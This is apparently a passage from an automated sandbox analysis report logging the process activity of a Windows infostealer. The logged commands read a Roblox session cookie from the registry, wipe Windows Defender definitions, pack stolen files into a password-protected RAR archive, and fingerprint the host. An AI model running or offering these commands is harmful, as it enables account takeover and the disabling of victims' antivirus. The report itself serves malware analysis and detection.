                                                                                                                                                                                                                                          Start time:04:44:11
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
                                                                                                                                                                                                                                          Imagebase:0x7ff646230000
                                                                                                                                                                                                                                          File size:2'759'232 bytes
                                                                                                                                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:getmac
                                                                                                                                                                                                                                          Imagebase:0x7ff6ed7b0000
                                                                                                                                                                                                                                          File size:90'112 bytes
                                                                                                                                                                                                                                          MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                          Start time:04:44:12
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
                                                                                                                                                                                                                                          Imagebase:0x7ff7915c0000
                                                                                                                                                                                                                                          File size:52'744 bytes
                                                                                                                                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                          Start time:04:44:13
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                          Start time:04:44:14
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:59
                                                                                                                                                                                                                                          Start time:04:44:16
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:60
                                                                                                                                                                                                                                          Start time:04:44:16
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:61
                                                                                                                                                                                                                                          Start time:04:44:16
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:63
                                                                                                                                                                                                                                          Start time:04:44:18
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                          Imagebase:0x7ff61f730000
                                                                                                                                                                                                                                          File size:468'120 bytes
                                                                                                                                                                                                                                          MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:66
                                                                                                                                                                                                                                          Start time:04:44:24
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:67
                                                                                                                                                                                                                                          Start time:04:44:24
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:68
                                                                                                                                                                                                                                          Start time:04:44:24
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
                                                                                                                                                                                                                                          Imagebase:0x7ff702c00000
                                                                                                                                                                                                                                          File size:630'736 bytes
                                                                                                                                                                                                                                          MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:69
                                                                                                                                                                                                                                          Start time:04:44:26
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:70
                                                                                                                                                                                                                                          Start time:04:44:26
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:71
                                                                                                                                                                                                                                          Start time:04:44:26
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic os get Caption
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:72
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                          Start time:04:44:27
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:76
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:77
                                                                                                                                                                                                                                          Start time:04:44:28
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                          Imagebase:0x7ff7374d0000
                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:78
                                                                                                                                                                                                                                          Start time:04:44:29
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:79
                                                                                                                                                                                                                                          Start time:04:44:29
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:80
                                                                                                                                                                                                                                          Start time:04:44:29
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:81
                                                                                                                                                                                                                                          Start time:04:44:31
